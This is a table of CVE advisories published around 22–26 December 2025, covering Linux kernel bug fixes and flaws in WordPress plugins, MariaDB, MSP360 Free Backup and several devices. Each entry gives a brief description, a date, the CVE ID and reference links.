| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/ivpu: Fix page fault in ivpu_bo_unbind_all_bos_from_context() Don't add BO to the vdev->bo_list in ivpu_gem_create_object(). When failure happens inside drm_gem_shmem_create(), the BO is not fully created and ivpu_gem_bo_free() callback will not be called causing a deleted BO to be left on the list. | 2025-12-24 | not yet calculated | CVE-2025-68730 | https://git.kernel.org/stable/c/8172838a284c27190fa6782c2740a97020434750 https://git.kernel.org/stable/c/c9ef5ccd8bd9bcf598b6d3f77e7eb4dde7149aec https://git.kernel.org/stable/c/8b694b405a84696f1d964f6da7cf9721e68c4714 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/amdxdna: Fix an integer overflow in aie2_query_ctx_status_array() The unpublished smatch static checker reported a warning. drivers/accel/amdxdna/aie2_pci.c:904 aie2_query_ctx_status_array() warn: potential user controlled sizeof overflow 'args->num_element * args->element_size' '1-u32max(user) * 1-u32max(user)' Even this will not cause a real issue, it is better to put a reasonable limitation for element_size and num_element. Add condition to make sure the input element_size <= 4K and num_element <= 1K. | 2025-12-24 | not yet calculated | CVE-2025-68731 | https://git.kernel.org/stable/c/359653edd5374fbba28f93043554dcc494aee85f https://git.kernel.org/stable/c/9e16c8bf9aebf629344cfd4cd5e3dc7d8c3f7d82 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpu: host1x: Fix race in syncpt alloc/free Fix race condition between host1x_syncpt_alloc() and host1x_syncpt_put() by using kref_put_mutex() instead of kref_put() + manual mutex locking. This ensures no thread can acquire the syncpt_mutex after the refcount drops to zero but before syncpt_release acquires it. This prevents races where syncpoints could be allocated while still being cleaned up from a previous release. Remove explicit mutex locking in syncpt_release as kref_put_mutex() handles this atomically. | 2025-12-24 | not yet calculated | CVE-2025-68732 | https://git.kernel.org/stable/c/4e6e07ce0197aecfb6c4a62862acc93b3efedeb7 https://git.kernel.org/stable/c/d138f73ffb0c57ded473c577719e6e551b7b1f27 https://git.kernel.org/stable/c/79197c6007f2afbfd7bcf5b9b80ccabf8483d774 https://git.kernel.org/stable/c/c7d393267c497502fa737607f435f05dfe6e3d9b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smack: fix bug: unprivileged task can create labels If an unprivileged task is allowed to relabel itself (/smack/relabel-self is not empty), it can freely create new labels by writing their names into own /proc/PID/attr/smack/current This occurs because do_setattr() imports the provided label in advance, before checking "relabel-self" list. This change ensures that the "relabel-self" list is checked before importing the label. | 2025-12-24 | not yet calculated | CVE-2025-68733 | https://git.kernel.org/stable/c/ac9fce2efabad37c338aac86fbe100f77a080e59 https://git.kernel.org/stable/c/64aa81250171b6bb6803e97ea7a5d73bfa061f6e https://git.kernel.org/stable/c/60e8d49989410a7ade60f5dadfcd979c117d05c0 https://git.kernel.org/stable/c/c147e13ea7fe9f118f8c9ba5e96cbd644b00d6b3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: isdn: mISDN: hfcsusb: fix memory leak in hfcsusb_probe() In hfcsusb_probe(), the memory allocated for ctrl_urb gets leaked when setup_instance() fails with an error code. Fix that by freeing the urb before freeing the hw structure. Also change the error paths to use the goto ladder style. Compile tested only. Issue found using a prototype static analysis tool. | 2025-12-24 | not yet calculated | CVE-2025-68734 | https://git.kernel.org/stable/c/475032fa2bb82ffb592c321885e917e39f47357f https://git.kernel.org/stable/c/adb7577e23a431fc53aa1b6107733c0d751015fb https://git.kernel.org/stable/c/b70c24827e11fdc71465f9207e974526fb457bb9 https://git.kernel.org/stable/c/3f7c72bc73c4e542fde14cce017549d8a0b61a3c https://git.kernel.org/stable/c/03695541b3349bc40bf5d6563d44d6147fb20260 https://git.kernel.org/stable/c/6dce43433e0635e7b00346bc937b69ce48ea71bb https://git.kernel.org/stable/c/ea7936304ed74ab7f965d17f942a173ce91a5ca8 https://git.kernel.org/stable/c/3f978e3f1570155a1327ffa25f60968bc7b9398f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panthor: Prevent potential UAF in group creation This commit prevents the possibility of a use after free issue in the GROUP_CREATE ioctl function, which arose as pointer to the group is accessed in that ioctl function after storing it in the Xarray. A malicious userspace can second guess the handle of a group and try to call GROUP_DESTROY ioctl from another thread around the same time as GROUP_CREATE ioctl. To prevent the use after free exploit, this commit uses a mark on an entry of group pool Xarray which is added just before returning from the GROUP_CREATE ioctl function. The mark is checked for all ioctls that specify the group handle and so userspace won't be abe to delete a group that isn't marked yet. v2: Add R-bs and fixes tags | 2025-12-24 | not yet calculated | CVE-2025-68735 | https://git.kernel.org/stable/c/deb8b2491f6b9882ae02d7dc2651c7bf4f3b7e05 https://git.kernel.org/stable/c/c646ebff3fa571e7ea974235286fb9ed3edc260c https://git.kernel.org/stable/c/eec7e23d848d2194dd8791fcd0f4a54d4378eecd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: landlock: Fix handling of disconnected directories Disconnected files or directories can appear when they are visible and opened from a bind mount, but have been renamed or moved from the source of the bind mount in a way that makes them inaccessible from the mount point (i.e. out of scope). Previously, access rights tied to files or directories opened through a disconnected directory were collected by walking the related hierarchy down to the root of the filesystem, without taking into account the mount point because it couldn't be found. This could lead to inconsistent access results, potential access right widening, and hard-to-debug renames, especially since such paths cannot be printed. For a sandboxed task to create a disconnected directory, it needs to have write access (i.e. FS_MAKE_REG, FS_REMOVE_FILE, and FS_REFER) to the underlying source of the bind mount, and read access to the related mount point. Because a sandboxed task cannot acquire more access rights than those defined by its Landlock domain, this could lead to inconsistent access rights due to missing permissions that should be inherited from the mount point hierarchy, while inheriting permissions from the filesystem hierarchy hidden by this mount point instead. Landlock now handles files and directories opened from disconnected directories by taking into account the filesystem hierarchy when the mount point is not found in the hierarchy walk, and also always taking into account the mount point from which these disconnected directories were opened. This ensures that a rename is not allowed if it would widen access rights [1]. The rationale is that, even if disconnected hierarchies might not be visible or accessible to a sandboxed task, relying on the collected access rights from them improves the guarantee that access rights will not be widened during a rename because of the access right comparison between the source and the destination (see LANDLOCK_ACCESS_FS_REFER). It may look like this would grant more access on disconnected files and directories, but the security policies are always enforced for all the evaluated hierarchies. This new behavior should be less surprising to users and safer from an access control perspective. Remove a wrong WARN_ON_ONCE() canary in collect_domain_accesses() and fix the related comment. Because opened files have their access rights stored in the related file security properties, there is no impact for disconnected or unlinked files. | 2025-12-24 | not yet calculated | CVE-2025-68736 | https://git.kernel.org/stable/c/cadb28f8b3fd6908e3051e86158c65c3a8e1c907 https://git.kernel.org/stable/c/49c9e09d961025b22e61ef9ad56aa1c21b6ce2f1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arm64/pageattr: Propagate return value from __change_memory_common The rodata=on security measure requires that any code path which does vmalloc -> set_memory_ro/set_memory_rox must protect the linear map alias too. Therefore, if such a call fails, we must abort set_memory_* and caller must take appropriate action; currently we are suppressing the error, and there is a real chance of such an error arising post commit a166563e7ec3 ("arm64: mm: support large block mapping when rodata=full"). Therefore, propagate any error to the caller. | 2025-12-24 | not yet calculated | CVE-2025-68737 | https://git.kernel.org/stable/c/3e2fc1e57a5361633a4bf4222640c6bfe41ff8ea https://git.kernel.org/stable/c/e5efd56fa157d2e7d789949d1d64eccbac18a897 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: mt7996: fix null pointer deref in mt7996_conf_tx() If a link does not have an assigned channel yet, mt7996_vif_link returns NULL. We still need to store the updated queue settings in that case, and apply them later. Move the location of the queue params to within struct mt7996_vif_link. | 2025-12-24 | not yet calculated | CVE-2025-68738 | https://git.kernel.org/stable/c/96841352aaba7723c20afb3a5356746810ef8198 https://git.kernel.org/stable/c/b8f34c1c5c4f5130c20e3253c95ba1d844d402b9 https://git.kernel.org/stable/c/79277f8ad15ec5f255ed0e1427c7a8a3e94e7f52 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PM / devfreq: hisi: Fix potential UAF in OPP handling Ensure all required data is acquired before calling dev_pm_opp_put(opp) to maintain correct resource acquisition and release order. | 2025-12-24 | not yet calculated | CVE-2025-68739 | https://git.kernel.org/stable/c/efb028b07f7b2d141b91c2fab5276b601f0d0dbe https://git.kernel.org/stable/c/469b0b8ce08818f3e4f01d2fa8d0dadeab501e1f https://git.kernel.org/stable/c/26dd44a40096468396b6438985d8e44e0743f64c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ima: Handle error code returned by ima_filter_rule_match() In ima_match_rules(), if ima_filter_rule_match() returns -ENOENT due to the rule being NULL, the function incorrectly skips the 'if (!rc)' check and sets 'result = true'. The LSM rule is considered a match, causing extra files to be measured by IMA. This issue can be reproduced in the following scenario: After unloading the SELinux policy module via 'semodule -d', if an IMA measurement is triggered before ima_lsm_rules is updated, in ima_match_rules(), the first call to ima_filter_rule_match() returns -ESTALE. This causes the code to enter the 'if (rc == -ESTALE && !rule_reinitialized)' block, perform ima_lsm_copy_rule() and retry. In ima_lsm_copy_rule(), since the SELinux module has been removed, the rule becomes NULL, and the second call to ima_filter_rule_match() returns -ENOENT. This bypasses the 'if (!rc)' check and results in a false match. Call trace: selinux_audit_rule_match+0x310/0x3b8 security_audit_rule_match+0x60/0xa0 ima_match_rules+0x2e4/0x4a0 ima_match_policy+0x9c/0x1e8 ima_get_action+0x48/0x60 process_measurement+0xf8/0xa98 ima_bprm_check+0x98/0xd8 security_bprm_check+0x5c/0x78 search_binary_handler+0x6c/0x318 exec_binprm+0x58/0x1b8 bprm_execve+0xb8/0x130 do_execveat_common.isra.0+0x1a8/0x258 __arm64_sys_execve+0x48/0x68 invoke_syscall+0x50/0x128 el0_svc_common.constprop.0+0xc8/0xf0 do_el0_svc+0x24/0x38 el0_svc+0x44/0x200 el0t_64_sync_handler+0x100/0x130 el0t_64_sync+0x3c8/0x3d0 Fix this by changing 'if (!rc)' to 'if (rc <= 0)' to ensure that error codes like -ENOENT do not bypass the check and accidentally result in a successful match. | 2025-12-24 | not yet calculated | CVE-2025-68740 | https://git.kernel.org/stable/c/c2238d487a640ae3511e1b6f4640ab27ce10d7f6 https://git.kernel.org/stable/c/de4431faf308d0c533cb386f5fa9af009bc86158 https://git.kernel.org/stable/c/32952c4f4d1b2deb30dce72ba109da808a9018e1 https://git.kernel.org/stable/c/738c9738e690f5cea24a3ad6fd2d9a323cf614f6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: Fix improper freeing of purex item In qla2xxx_process_purls_iocb(), an item is allocated via qla27xx_copy_multiple_pkt(), which internally calls qla24xx_alloc_purex_item(). The qla24xx_alloc_purex_item() function may return a pre-allocated item from a per-adapter pool for small allocations, instead of dynamically allocating memory with kzalloc(). An error handling path in qla2xxx_process_purls_iocb() incorrectly uses kfree() to release the item. If the item was from the pre-allocated pool, calling kfree() on it is a bug that can lead to memory corruption. Fix this by using the correct deallocation function, qla24xx_free_purex_item(), which properly handles both dynamically allocated and pre-allocated items. | 2025-12-24 | not yet calculated | CVE-2025-68741 | https://git.kernel.org/stable/c/8e9f0a0717ba31d5842721627ade1e62d7aec012 https://git.kernel.org/stable/c/cfe3e2f768d248fd3d965d561d0768a56dd0b9f8 https://git.kernel.org/stable/c/5fa1c8226b4532ad7011d295d3ab4ad45df105ae https://git.kernel.org/stable/c/78b1a242fe612a755f2158fd206ee6bb577d18ca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix invalid prog->stats access when update_effective_progs fails Syzkaller triggers an invalid memory access issue following fault injection in update_effective_progs. The issue can be described as follows: __cgroup_bpf_detach update_effective_progs compute_effective_progs bpf_prog_array_alloc <-- fault inject purge_effective_progs /* change to dummy_bpf_prog */ array->items[index] = &dummy_bpf_prog.prog ---softirq start--- __do_softirq ... __cgroup_bpf_run_filter_skb __bpf_prog_run_save_cb bpf_prog_run stats = this_cpu_ptr(prog->stats) /* invalid memory access */ flags = u64_stats_update_begin_irqsave(&stats->syncp) ---softirq end--- static_branch_dec(&cgroup_bpf_enabled_key[atype]) The reason is that fault injection caused update_effective_progs to fail and then changed the original prog into dummy_bpf_prog.prog in purge_effective_progs. Then a softirq came, and accessing the members of dummy_bpf_prog.prog in the softirq triggers invalid mem access. To fix it, skip updating stats when stats is NULL. | 2025-12-24 | not yet calculated | CVE-2025-68742 | https://git.kernel.org/stable/c/539137e3038ce6f953efd72110110f03c14c7d97 https://git.kernel.org/stable/c/56905bb70c8b88421709bb4e32fcba617aa37d41 https://git.kernel.org/stable/c/2579c356ccd35d06238b176e4b460978186d804b https://git.kernel.org/stable/c/7dc211c1159d991db609bdf4b0fb9033c04adcbc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mshv: Fix create memory region overlap check The current check is incorrect; it only checks if the beginning or end of a region is within an existing region. This doesn't account for userspace specifying a region that begins before and ends after an existing region. Change the logic to a range intersection check against gfns and uaddrs for each region. Remove mshv_partition_region_by_uaddr() as it is no longer used. | 2025-12-24 | not yet calculated | CVE-2025-68743 | https://git.kernel.org/stable/c/2183924dd834e0703f87e17c17e689bcbf55d69d https://git.kernel.org/stable/c/ab3e7a78d83a61d335458cfe2e4d17eba69ae73d https://git.kernel.org/stable/c/ba9eb9b86d232854e983203dc2fb1ba18e316681 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Free special fields when update [lru_,]percpu_hash maps As [lru_,]percpu_hash maps support BPF_KPTR_{REF,PERCPU}, missing calls to 'bpf_obj_free_fields()' in 'pcpu_copy_value()' could cause the memory referenced by BPF_KPTR_{REF,PERCPU} fields to be held until the map gets freed. Fix this by calling 'bpf_obj_free_fields()' after 'copy_map_value[,_long]()' in 'pcpu_copy_value()'. | 2025-12-24 | not yet calculated | CVE-2025-68744 | https://git.kernel.org/stable/c/3bf1378747e251571e0de15e7e0a6bf2919044e7 https://git.kernel.org/stable/c/96a5cb7072cabbac5c66ac9318242c3bdceebb68 https://git.kernel.org/stable/c/4a03d69cece145e4fb527464be29c3806aa3221e https://git.kernel.org/stable/c/6af6e49a76c9af7d42eb923703e7648cb2bf401a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: Clear cmds after chip reset Commit aefed3e5548f ("scsi: qla2xxx: target: Fix offline port handling and host reset handling") caused two problems: 1. Commands sent to FW, after chip reset got stuck and never freed as FW is not going to respond to them anymore. 2. BUG_ON(cmd->sg_mapped) in qlt_free_cmd(). Commit 26f9ce53817a ("scsi: qla2xxx: Fix missed DMA unmap for aborted commands") attempted to fix this, but introduced another bug under different circumstances when two different CPUs were racing to call qlt_unmap_sg() at the same time: BUG_ON(!valid_dma_direction(dir)) in dma_unmap_sg_attrs(). So revert "scsi: qla2xxx: Fix missed DMA unmap for aborted commands" and partially revert "scsi: qla2xxx: target: Fix offline port handling and host reset handling" at __qla2x00_abort_all_cmds. | 2025-12-24 | not yet calculated | CVE-2025-68745 | https://git.kernel.org/stable/c/5c1fb3fd05da3d55b8cbc42d7d660b313cbdc936 https://git.kernel.org/stable/c/d46c69a087aa3d1513f7a78f871b80251ea0c1ae |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: tegra210-quad: Fix timeout handling When the CPU that the QSPI interrupt handler runs on (typically CPU 0) is excessively busy, it can lead to rare cases of the IRQ thread not running before the transfer timeout is reached. While handling the timeouts, any pending transfers are cleaned up and the message that they correspond to is marked as failed, which leaves the curr_xfer field pointing at stale memory. To avoid this, clear curr_xfer to NULL upon timeout and check for this condition when the IRQ thread is finally run. While at it, also make sure to clear interrupts on failure so that new interrupts can be run. A better, more involved, fix would move the interrupt clearing into a hard IRQ handler. Ideally we would also want to signal that the IRQ thread no longer needs to be run after the timeout is hit to avoid the extra check for a valid transfer. | 2025-12-24 | not yet calculated | CVE-2025-68746 | https://git.kernel.org/stable/c/551060efb156c50fe33799038ba8145418cfdeef https://git.kernel.org/stable/c/bb0c58be84f907285af45657c1d4847b960a12bf https://git.kernel.org/stable/c/01bbf25c767219b14c3235bfa85906b8d2cb8fbc https://git.kernel.org/stable/c/b4e002d8a7cee3b1d70efad0e222567f92a73000 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panthor: Fix UAF on kernel BO VA nodes If the MMU is down, panthor_vm_unmap_range() might return an error. We expect the page table to be updated still, and if the MMU is blocked, the rest of the GPU should be blocked too, so no risk of accessing physical memory returned to the system (which the current code doesn't cover for anyway). Proceed with the rest of the cleanup instead of bailing out and leaving the va_node inserted in the drm_mm, which leads to UAF when other adjacent nodes are removed from the drm_mm tree. | 2025-12-24 | not yet calculated | CVE-2025-68747 | https://git.kernel.org/stable/c/5a0060ddfc1fcfdb0f7b4fa1b7b3b0c436151391 https://git.kernel.org/stable/c/1123eadb843588b361c96f53a771202b7953154f https://git.kernel.org/stable/c/0612704b6f6ddf2ae223019c52148c5ac76cf70e https://git.kernel.org/stable/c/98dd5143447af0ee33551776d8b2560c35d0bc4a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panthor: Fix UAF race between device unplug and FW event processing The function panthor_fw_unplug() will free the FW memory sections. The problem is that there could still be pending FW events which are yet not handled at this point. process_fw_events_work() can in this case try to access said freed memory. Simply call disable_work_sync() to both drain and prevent future invocation of process_fw_events_work(). | 2025-12-24 | not yet calculated | CVE-2025-68748 | https://git.kernel.org/stable/c/31db188355a49337e3e8ec98b99377e482eab22c https://git.kernel.org/stable/c/5e3ff56d4cb591daea70786d07dc21d06dc34108 https://git.kernel.org/stable/c/6c1da9ae2c123a9ffda5375e64cc81f9ed3cc04a https://git.kernel.org/stable/c/7051f6ba968fa69918d72cc26de4d6cf7ea05b90 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/ivpu: Fix race condition when unbinding BOs Fix 'Memory manager not clean during takedown' warning that occurs when ivpu_gem_bo_free() removes the BO from the BOs list before it gets unmapped. Then file_priv_unbind() triggers a warning in drm_mm_takedown() during context teardown. Protect the unmapping sequence with bo_list_lock to ensure the BO is always fully unmapped when removed from the list. This ensures the BO is either fully unmapped at context teardown time or present on the list and unmapped by file_priv_unbind(). | 2025-12-24 | not yet calculated | CVE-2025-68749 | https://git.kernel.org/stable/c/fb16493ebd8f171bcf0772262619618a131f30f7 https://git.kernel.org/stable/c/d71333ffdd3707d84cfb95acfaf8ba892adc066b https://git.kernel.org/stable/c/00812636df370bedf4e44a0c81b86ea96bca8628 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: potential integer overflow in usbg_make_tpg() The variable tpgt in usbg_make_tpg() is defined as unsigned long and is assigned to tpgt->tport_tpgt, which is defined as u16. This may cause an integer overflow when tpgt is greater than USHRT_MAX (65535). I haven't tried to trigger it myself, but it is possible to trigger it by calling usbg_make_tpg() with a large value for tpgt. I modified the type of tpgt to match tpgt->tport_tpgt and adjusted the relevant code accordingly. This patch is similar to commit 59c816c1f24d ("vhost/scsi: potential memory corruption"). | 2025-12-24 | not yet calculated | CVE-2025-68750 | https://git.kernel.org/stable/c/0861b9cb2ff519b7c5a3b1dd52a343e18c4efb24 https://git.kernel.org/stable/c/603a83e5fee38a950bfcfb2f36449311fa00a474 https://git.kernel.org/stable/c/6f77e344515b5258edb3988188311464209b1c7c https://git.kernel.org/stable/c/6722e080b5b39ab7471386c73d0c1b39572f943c https://git.kernel.org/stable/c/a33f507f36d5881f602dab581ab0f8d22b49762c https://git.kernel.org/stable/c/358d5ba08f1609c34a054aed88c431844d09705a https://git.kernel.org/stable/c/620a5e1e84a3a7004270703a118d33eeb1c0f368 https://git.kernel.org/stable/c/153874010354d050f62f8ae25cbb960c17633dc5 |
| Liton Arefin--WP Adminify | Missing Authorization vulnerability in Liton Arefin WP Adminify adminify allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Adminify: from n/a through <= 4.0.6.1. | 2025-12-24 | not yet calculated | CVE-2025-68592 | https://vdp.patchstack.com/database/Wordpress/Plugin/adminify/vulnerability/wordpress-wp-adminify-plugin-4-0-6-1-broken-access-control-vulnerability-2?_s_id=cve |
| Liton Arefin--WP Adminify | Missing Authorization vulnerability in Liton Arefin WP Adminify adminify allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Adminify: from n/a through <= 4.0.6.1. | 2025-12-24 | not yet calculated | CVE-2025-68593 | https://vdp.patchstack.com/database/Wordpress/Plugin/adminify/vulnerability/wordpress-wp-adminify-plugin-4-0-6-1-broken-access-control-vulnerability?_s_id=cve |
| LiveComposer--Page Builder: Live Composer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiveComposer Page Builder: Live Composer live-composer-page-builder allows Stored XSS. This issue affects Page Builder: Live Composer: from n/a through <= 2.0.5. | 2025-12-24 | not yet calculated | CVE-2025-68598 | https://vdp.patchstack.com/database/Wordpress/Plugin/live-composer-page-builder/vulnerability/wordpress-page-builder-live-composer-plugin-2-0-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| MariaDB--MariaDB | MariaDB mariadb-dump Utility Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of MariaDB. Interaction with the mariadb-dump utility is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the handling of view names. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27000. | 2025-12-23 | not yet calculated | CVE-2025-13699 | ZDI-25-1025 vendor-provided URL |
| Marketing Fire--Editorial Calendar | Missing Authorization vulnerability in Marketing Fire Editorial Calendar editorial-calendar allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Editorial Calendar: from n/a through <= 3.8.8. | 2025-12-24 | not yet calculated | CVE-2025-68603 | https://vdp.patchstack.com/database/Wordpress/Plugin/editorial-calendar/vulnerability/wordpress-editorial-calendar-plugin-3-8-8-broken-access-control-vulnerability?_s_id=cve |
| Mitchell Bennis--Simple File List | Missing Authorization vulnerability in Mitchell Bennis Simple File List simple-file-list allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Simple File List: from n/a through <= 6.1.15. | 2025-12-24 | not yet calculated | CVE-2025-68591 | https://vdp.patchstack.com/database/Wordpress/Plugin/simple-file-list/vulnerability/wordpress-simple-file-list-plugin-6-1-15-broken-access-control-vulnerability?_s_id=cve |
| modeltheme--ModelTheme Addons for WPBakery and Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in modeltheme ModelTheme Addons for WPBakery and Elementor modeltheme-addons-for-wpbakery allows Stored XSS.This issue affects ModelTheme Addons for WPBakery and Elementor: from n/a through < 1.5.6. | 2025-12-24 | not yet calculated | CVE-2025-68532 | https://vdp.patchstack.com/database/Wordpress/Plugin/modeltheme-addons-for-wpbakery/vulnerability/wordpress-modeltheme-addons-for-wpbakery-and-elementor-plugin-1-5-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| MSP360--Free Backup | MSP360 Free Backup Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of MSP360 Free Backup. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. User interaction on the part of an administrator is needed additionally. The specific flaw exists within the restore functionality. By creating a junction, an attacker can abuse the service to create arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27245. | 2025-12-23 | not yet calculated | CVE-2025-12838 | ZDI-25-988 |
| Frappe--Attachments module of Frappe Framework v15.89.0 | An arbitrary file upload vulnerability in the Attachments module of Frappe Framework v15.89.0 allows attackers to execute arbitrary code via uploading a crafted XML file. | 2025-12-22 | not yet calculated | CVE-2025-67289 | http://erpnext.com http://frappe.com https://github.com/vuquyen03/CVE/blob/main/CVE-2025-67289/README.md |
| Blitz--Blitz Panel v1.17.0 | An open redirect vulnerability in the login endpoint of Blitz Panel v1.17.0 allows attackers to redirect users to malicious domains via a crafted URL. This issue affects the next_url parameter in the login endpoint and could lead to phishing or token theft after successful authentication. | 2025-12-24 | not yet calculated | CVE-2025-60935 | https://github.com/ReturnFI/Blitz https://gist.github.com/HEXER365/2e866b47d56585e1e59e7c16bf4b4db7 |
| Cadmium--Cadmium CMS v.0.4.9 | Cadmium CMS v.0.4.9 has a background arbitrary file upload vulnerability in /admin/content/filemanager/uploads. | 2025-12-23 | not yet calculated | CVE-2025-51511 | https://github.com/cadmium-org/cadmium-cms/issues/23 |
| ClinCapture--ClinCapture EDC 3.0 and 2.2.3 | Reflected cross-site scripting (XSS) vulnerability in ClinCapture EDC 3.0 and 2.2.3, allowing an unauthenticated remote attacker to execute JavaScript code in the context of the victim's browser. | 2025-12-22 | not yet calculated | CVE-2025-65270 | https://www.clincapture.com/ https://github.com/xh4vm/CVE-2025-65270 |
| ClipBucket--ClipBucket 5.5.2 | ClipBucket 5.5.2 is affected by an improper access control issue where the product is shipped or deployed with hardcoded default administrative credentials. An unauthenticated remote attacker can log in to the administrative panel using these default credentials, resulting in full administrative control of the application. | 2025-12-22 | not yet calculated | CVE-2025-67418 | http://clipbucket.com https://medium.com/@arpit03sharma2003/cve-2025-67418-when-default-credentials-become-a-remote-root-button-03be5ee4b927 |
| CloudLog--Cloudlog v2.6.15 | Time-based blind SQL Injection vulnerability in Cloudlog v2.6.15 at the endpoint /index.php/logbookadvanced/search in the qsoresults parameter. | 2025-12-26 | not yet calculated | CVE-2024-44065 | https://github.com/magicbug/Cloudlog https://github.com/jacopo1223/jacopo.github/tree/main/CVE-2024-44065 |
| Cola--Cola Dnslog v1.3.2 | Cola Dnslog v1.3.2 is vulnerable to Directory Traversal. When a DNS query for a TXT record is processed, the application concatenates the requested URL (or a portion of it) directly with a base path using os.path.join. This bypass allows directory traversal or absolute path injection, leading to the potential exposure of sensitive information. | 2025-12-26 | not yet calculated | CVE-2025-57403 | https://github.com/AbelChe/cola_dnslog/issues/29 https://gist.github.com/Captaince/99b728c792c72b2666c2400625702df0 |
| Comtech--Comtech EF Data CDM-625 / CDM-625A | Incorrect access control in Comtech EF Data CDM-625 / CDM-625A Advanced Satellite Modem with firmware v2.5.1 allows attackers to change the Administrator password and escalate privileges via sending a crafted POST request to /Forms/admin_access_1. | 2025-12-26 | not yet calculated | CVE-2025-67015 | https://www.comtechefdata.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-67015%20_%20Comtech%20EF%20Data%20CDM-625%20_%20CDM-625A%20Advanced%20_%20Broken%20Access%20Control |
| Croogo--Croogo CMS 4.0.7 | A path traversal vulnerability in Croogo CMS 4.0.7 allows remote attackers to read arbitrary files via a specially crafted path in the 'edit-file' parameter. | 2025-12-26 | not yet calculated | CVE-2024-42718 | https://github.com/croogo/croogo https://github.com/jacopo1223/jacopo.github/tree/main/CVE-2024-42718 |
| --Delight Custom Firmware (CFW) for Nokia Symbian Belle devices on Nokia 808 (Delight v1.8), Nokia N8 (Delight v6.7), Nokia E7 (Delight v1.3), Nokia C7 (Delight v6.7), Nokia 700 (Delight v1.2), Nokia 701 (Delight v1.1), Nokia 603 (Delight v1.0), Nokia 500 (Delight v1.2), Nokia E6 (Delight v1.0), Nokia Oro (Delight v1.0), and Vertu Constellation T (Delight v1.0) | An issue was discovered in the Delight Custom Firmware (CFW) for Nokia Symbian Belle devices on Nokia 808 (Delight v1.8), Nokia N8 (Delight v6.7), Nokia E7 (Delight v1.3), Nokia C7 (Delight v6.7), Nokia 700 (Delight v1.2), Nokia 701 (Delight v1.1), Nokia 603 (Delight v1.0), Nokia 500 (Delight v1.2), Nokia E6 (Delight v1.0), Nokia Oro (Delight v1.0), and Vertu Constellation T (Delight v1.0) allowing local attackers to inject startup scripts via crafted .txt files in the :\Data directory. | 2025-12-26 | not yet calculated | CVE-2025-65885 | https://www.symwld.com/delight/ https://gist.github.com/symbuzzer/3315e88adc2bba0b6cc66d192b49546d |
| --DEV Systemtechnik GmbH DEV 7113 RF over Fiber Distribution System 32-0078 H.01 | Incorrect access control in DEV Systemtechnik GmbH DEV 7113 RF over Fiber Distribution System 32-0078 H.01 allows unauthenticated attackers to access an administrative endpoint. | 2025-12-26 | not yet calculated | CVE-2025-67014 | https://dev-systemtechnik.com https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-67014%20_%20DEV%20Systemtechnik%20GmbH%20DEV%207113%20RF%20over%20_%20Broken%20Access%20Control |
| Eclipse--Eclipse Cyclone DDS before v0.10.5 | Improper verification of the time certificate in Eclipse Cyclone DDS before v0.10.5 allows attackers to bypass certificate checks and execute commands with System privileges. | 2025-12-23 | not yet calculated | CVE-2025-67109 | http://eclipse.com https://github.com/eclipse-cyclonedds/cyclonedds/blob/master/src/ddsrt/src/time/posix/time.c#L28 https://github.com/eclipse-cyclonedds/cyclonedds/blob/master/src/security/builtin_plugins/authentication/src/auth_utils.c#L84 https://gist.github.com/lkloliver/669e15bc7e6194133e4ee1026ce157e6 |
| eProsima--eProsima Fast-DDS v3.3 | An integer overflow in eProsima Fast-DDS v3.3 allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2025-12-23 | not yet calculated | CVE-2025-65865 | http://eprosima.com http://fast-dds.com https://github.com/lkloliver/poc/blob/main/Detail.md https://gist.github.com/lkloliver/7aa48cb9fc7a1dd74cb595212bb69d33 |
| eProsima--eProsima Fast-DDS v3.3 | eProsima Fast-DDS v3.3 was discovered to contain improper validation for ticket revocation, resulting in insecure communications and connections. | 2025-12-23 | not yet calculated | CVE-2025-67108 | http://eprosima.com http://fast-dds.com https://github.com/eProsima/Fast-DDS/blob/master/src/cpp/security/accesscontrol/Permissions.cpp#L263 https://gist.github.com/lkloliver/81b5d5a8328d712dbfd497bf11dbe913 |
